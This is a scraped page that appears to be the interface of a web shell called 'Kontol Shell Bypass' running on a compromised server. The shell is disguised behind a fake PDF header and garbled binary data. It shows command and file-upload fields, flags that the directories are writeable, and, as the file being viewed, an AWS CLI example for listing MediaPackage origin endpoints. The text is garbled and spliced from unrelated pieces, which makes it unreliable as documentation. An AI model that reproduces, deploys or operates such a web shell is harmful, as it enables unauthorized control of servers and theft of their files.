%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/mediapackage/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/mediapackage/list-origin-endpoints.rst
**To list all origin-endpoints on a channel**

The following ``list-origin-endpoints`` command lists all of the origin endpoints that are configured on the channel named ``test``. ::

    aws mediapackage list-origin-endpoints \
        --channel-id test

Output::

    {
        "OriginEndpoints": [
            {
                "Arn": "arn:aws:mediapackage:us-west-2:111222333:origin_endpoints/247cff871f2845d3805129be22f2c0a2",
                "ChannelId": "test",
                "DashPackage": {
                    "ManifestLayout": "FULL",
                    "ManifestWindowSeconds": 60,
                    "MinBufferTimeSeconds": 30,
                    "MinUpdatePeriodSeconds": 15,
                    "PeriodTriggers": [],
                    "Profile": "NONE",
                    "SegmentDurationSeconds": 2,
                    "SegmentTemplateFormat": "NUMBER_WITH_TIMELINE",
                    "StreamSelection": {
                        "MaxVideoBitsPerSecond": 2147483647,
                        "MinVideoBitsPerSecond": 0,
                        "StreamOrder": "ORIGINAL"
                    },
                    "SuggestedPresentationDelaySeconds": 25
                },
                "Id": "tester2",
                "ManifestName": "index",
                "StartoverWindowSeconds": 0,
                "Tags": {},
                "TimeDelaySeconds": 0,
                "Url": "https://8343f7014c0ea438.mediapackage.us-west-2.amazonaws.com/out/v1/247cff871f2845d3805129be22f2c0a2/index.mpd",
                "Whitelist": []
            },
            {
                "Arn": "arn:aws:mediapackage:us-west-2:111222333:origin_endpoints/869e237f851549e9bcf10e3bc2830839",
                "ChannelId": "test",
                "HlsPackage": {
                    "AdMarkers": "NONE",
                    "IncludeIframeOnlyStream": false,
                    "PlaylistType": "EVENT",
                    "PlaylistWindowSeconds": 60,
                    "ProgramDateTimeIntervalSeconds": 0,
                    "SegmentDurationSeconds": 6,
                    "StreamSelection": {
                        "MaxVideoBitsPerSecond": 2147483647,
                        "MinVideoBitsPerSecond": 0,
                        "StreamOrder": "ORIGINAL"
                    },
                    "UseAudioRenditionGroup": false
                },
                "Id": "tester",
                "ManifestName": "index",
                "StartoverWindowSeconds": 0,
                "Tags": {},
                "TimeDelaySeconds": 0,
                "Url": "https://8343f7014c0ea438.mediapackage.us-west-2.amazonaws.com/out/v1/869e237f851549e9bcf10e3bc2830839/index.m3u8",
                "Whitelist": []
            }
        ]
    }

For more information, see `Viewing all Endpoints Associated with a Channel <https://docs.aws.amazon.com/mediapackage/latest/ug/endpoints-view-all.html>`__ in the *AWS Elemental MediaPackage User Guide*.

Kontol Shell Bypass